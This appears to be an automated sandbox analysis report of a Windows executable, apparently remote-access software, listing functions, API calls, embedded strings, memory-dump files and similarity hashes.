                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$H_prolog3$CloseEnterErrorFindH_prolog3_catchInitializeLastLeave
                                                                                                        • String ID: PCK
                                                                                                        • API String ID: 530352687-2846323580
                                                                                                        • Opcode ID: fff6e1b957c7ab36fc9cb4e1cc0955655d41e0ea7b49d2370950475f56022630
                                                                                                        • Instruction ID: 83f8847adb6dfe63bae665bfaaf4613524d5f19933aea8dc096e1da97c4e7999
                                                                                                        • Opcode Fuzzy Hash: fff6e1b957c7ab36fc9cb4e1cc0955655d41e0ea7b49d2370950475f56022630
                                                                                                        • Instruction Fuzzy Hash: DF41B231900244EADB21EBB0CC59FDEBBB8BF21304F14465DF152A70E1DB74AA49C755
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004B7A28, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 004B7A32
                                                                                                          • Part of subcall function 004B5667: __EH_prolog3.LIBCMT ref: 004B566E
                                                                                                        • type_info::operator==.LIBCMT ref: 004B7A79
                                                                                                        Strings
                                                                                                        • GetBool %1%: invalid typeid (.\TVObject.cpp, 133), xrefs: 004B7AD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3H_prolog3_catchtype_info::operator==
                                                                                                        • String ID: GetBool %1%: invalid typeid (.\TVObject.cpp, 133)
                                                                                                        • API String ID: 2010590579-284449076
                                                                                                        • Opcode ID: cf7d6b0e69c84dad65208502c14560a7cf45a3d7b6e204be5d8219eca3517f59
                                                                                                        • Instruction ID: a9302d27a509db936128fe6c18a3d3f6a732ec724cc83fb8c508a93be74b9f46
                                                                                                        • Opcode Fuzzy Hash: cf7d6b0e69c84dad65208502c14560a7cf45a3d7b6e204be5d8219eca3517f59
                                                                                                        • Instruction Fuzzy Hash: C131C330A05209EBCF14EBA0C519AEDBB75BF85705F20406AF502BB2D1CB399F45DB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0053458E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000000,00542F8B,?,0054292D), ref: 00542EE8
                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000005,?,0054292D), ref: 00542EFF
                                                                                                          • Part of subcall function 00542EDB: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0054292D), ref: 00542F14
                                                                                                          • Part of subcall function 00542EDB: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00542F2F
                                                                                                        • __msize.LIBCMT ref: 005345C8
                                                                                                        • __realloc_crt.LIBCMT ref: 005345EA
                                                                                                        • __realloc_crt.LIBCMT ref: 00534601
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Value__realloc_crt$AddressHandleModuleProc__msize
                                                                                                        • String ID: GET
                                                                                                        • API String ID: 1847301476-3027191851
                                                                                                        • Opcode ID: 780d284c9a6238b2e76dc87fb16a7b290e7e057713a9a286b6f16bc3b42a1a80
                                                                                                        • Instruction ID: f00e53528c309d44aeae94062c4a1f100a4f485d6dbec02ec8c0286676dd130c
                                                                                                        • Opcode Fuzzy Hash: 780d284c9a6238b2e76dc87fb16a7b290e7e057713a9a286b6f16bc3b42a1a80
                                                                                                        • Instruction Fuzzy Hash: 9311EB325093235FDB24AF64EC465AA7FDDFB81765F20053AF401D31A2EF31AC544A94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0049B225, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                        • GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                          • Part of subcall function 0049B401: __EH_prolog3_GS.LIBCMT ref: 0049B408
                                                                                                          • Part of subcall function 004377A7: __EH_prolog3.LIBCMT ref: 004377AE
                                                                                                          • Part of subcall function 0041B2BC: __EH_prolog3.LIBCMT ref: 0041B2C3
                                                                                                          • Part of subcall function 0043775C: __EH_prolog3.LIBCMT ref: 00437763
                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$ErrorH_prolog3_Last
                                                                                                        • String ID: operation failed with error $OS_Rng:
                                                                                                        • API String ID: 3513993312-700108173
                                                                                                        • Opcode ID: c5190c8c64ff559717ca7177bc78e7e294630ded7cc2ee1ce8eaef379bb087b1
                                                                                                        • Instruction ID: 3dd9ab46a790745f88348808fbd2688a7aa5c78e29401b51255e0c78f3d7e4a6
                                                                                                        • Opcode Fuzzy Hash: c5190c8c64ff559717ca7177bc78e7e294630ded7cc2ee1ce8eaef379bb087b1
                                                                                                        • Instruction Fuzzy Hash: 69115EB2900158AADB21EBA5DC46EDFBAB8AF55704F00407EF509B7182DA781A09C7B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004FEB31, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004FEB38
                                                                                                        • connect.WS2_32(000000FF,0080B3C4,00000010), ref: 004FEB6D
                                                                                                        • WSAGetLastError.WS2_32 ref: 004FEB73
                                                                                                          • Part of subcall function 004A1847: __EH_prolog3_GS.LIBCMT ref: 004A184E
                                                                                                          • Part of subcall function 004A1847: InitializeCriticalSection.KERNEL32(?,00000028,004E1319,?,00000000,?,00000000,00000000,0078B904,00000000,PingResult,00000000,000000C4), ref: 004A1863
                                                                                                          • Part of subcall function 004A1847: _swprintf.LIBCMT ref: 004A1881
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        Strings
                                                                                                        • ncSocket::NotifySocket(): connect error code: , xrefs: 004FEB96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteErrorH_prolog3_Last_swprintfconnect
                                                                                                        • String ID: ncSocket::NotifySocket(): connect error code:
                                                                                                        • API String ID: 621515900-2945146241
                                                                                                        • Opcode ID: bc1cb2fc54388768d8a2f693abe840178c458a40864dba87a6b65d5f4c91f4ac
                                                                                                        • Instruction ID: 419566dfe3d4eeeabf7ed428c344a919846746c461fd325833273f79c6a0e7b5
                                                                                                        • Opcode Fuzzy Hash: bc1cb2fc54388768d8a2f693abe840178c458a40864dba87a6b65d5f4c91f4ac
                                                                                                        • Instruction Fuzzy Hash: 0C21C670C04289EADB15EBA4CC9AAEEBB34AF21305F14416DE152672E1DB782E44C755
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404826, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0040482D
                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 0040489F
                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 004048A5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3IncrefRegisterstd::locale::facet::_std::locale::facet::facet_
                                                                                                        • String ID: bad cast
                                                                                                        • API String ID: 3158697110-3145022300
                                                                                                        • Opcode ID: 8ced5b89b7d9ab17610447d71bdb08427623dac89d798b372c6a718c394a73f8
                                                                                                        • Instruction ID: 471960133c701604e416d2b83f0f93bbbd75309162c0f2f2f7cb49415d960507
                                                                                                        • Opcode Fuzzy Hash: 8ced5b89b7d9ab17610447d71bdb08427623dac89d798b372c6a718c394a73f8
                                                                                                        • Instruction Fuzzy Hash: 4501C47290021A97DF05FBA0C856AAE7B75BFC4710F144A2AE610BB2D1DF7CDD028795
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00434CCA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00434CD1
                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 00434D43
                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 00434D49
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3IncrefRegisterstd::locale::facet::_std::locale::facet::facet_
                                                                                                        • String ID: bad cast
                                                                                                        • API String ID: 3158697110-3145022300
                                                                                                        • Opcode ID: a124a4d2ea8ca464c6cf95c833c44338a81293ad478f23413c9d8641875e3366
                                                                                                        • Instruction ID: 3ec49f3b4a76577bcc47dffdc9c0708e6211fe0aac0466aa54d6ab715c277c8c
                                                                                                        • Opcode Fuzzy Hash: a124a4d2ea8ca464c6cf95c833c44338a81293ad478f23413c9d8641875e3366
                                                                                                        • Instruction Fuzzy Hash: 3401C07190021A97DF05EBA09896AFE7775BFD4324F24161AF120AB2D1DF38AE018B51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004EA761, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA768
                                                                                                        • WaitForSingleObject.KERNEL32(?,?,00000000,004DC578,000000FF,?,00000000,004DDCE3,00000001,WaitAtGateway,00000000,000003E4), ref: 004EA777
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalInitializeObjectSectionSingleWait
                                                                                                        • String ID: Thread.Join.Failed$Thread.Join.Timeout
                                                                                                        • API String ID: 1751434422-2669456123
                                                                                                        • Opcode ID: c54481291921678955b727d40aac5a0232130c95192884bed4e750254a218886
                                                                                                        • Instruction ID: 6ccdec6453605177a1c9418ddd035f0f1f3f2c7586396fbc4a122f84fd1fb71d
                                                                                                        • Opcode Fuzzy Hash: c54481291921678955b727d40aac5a0232130c95192884bed4e750254a218886
                                                                                                        • Instruction Fuzzy Hash: 2801D470A01110679A24BFB6881B49E7E21EF82772F20831AF5664B2D1DA385A50D7D6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004A1F74, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004A1F7B
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000078,0050E9DC,0075AF98,00784028,?,00000026,00000001,00000034,004E12F5,?,00000000,00000000,0078B904,00000000,PingResult), ref: 004A1F89
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,005070E5,0077C1F8,00000000), ref: 004A20B7
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004A2712: __EH_prolog3.LIBCMT ref: 004A2719
                                                                                                          • Part of subcall function 004A2712: EnterCriticalSection.KERNEL32(?,0000004C,004A2A1B,00781FF0,00000001,00000024,004F6410,@GATEWAY@), ref: 004A2727
                                                                                                          • Part of subcall function 004A2712: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 004A27DE
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000001,3B9ACA00,?,00000001,?,?,00000000,00000000,?,00000001,00000000,?), ref: 004A20A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$H_prolog3Leave$Enter$Initialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2897259054-0
                                                                                                        • Opcode ID: d7aa6604305006b98a7f70a400c645eb42ef6f8832bae4ae95faf94afb8023f5
                                                                                                        • Instruction ID: 1dc9fa40b33830896a83602739d3a005ce9794976ffcce36376282445166d4bc
                                                                                                        • Opcode Fuzzy Hash: d7aa6604305006b98a7f70a400c645eb42ef6f8832bae4ae95faf94afb8023f5
                                                                                                        • Instruction Fuzzy Hash: CE41ED3180415AEACF11EBA8CD95BEEBB78AF21304F10815EF552A72A1CF785F04DB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004A2712, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2719
                                                                                                        • EnterCriticalSection.KERNEL32(?,0000004C,004A2A1B,00781FF0,00000001,00000024,004F6410,@GATEWAY@), ref: 004A2727
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A27EF
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 004A27DE
                                                                                                          • Part of subcall function 004A1E9D: __EH_prolog3.LIBCMT ref: 004A1EA4
                                                                                                          • Part of subcall function 004A1E9D: EnterCriticalSection.KERNEL32(?,00000004,004A278C,00000000,00000000,?,00000000,?), ref: 004A1EB2
                                                                                                          • Part of subcall function 004A1E9D: CharUpperW.USER32(00000000), ref: 004A1EC9
                                                                                                          • Part of subcall function 004A1E9D: LeaveCriticalSection.KERNEL32(?), ref: 004A1EDC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
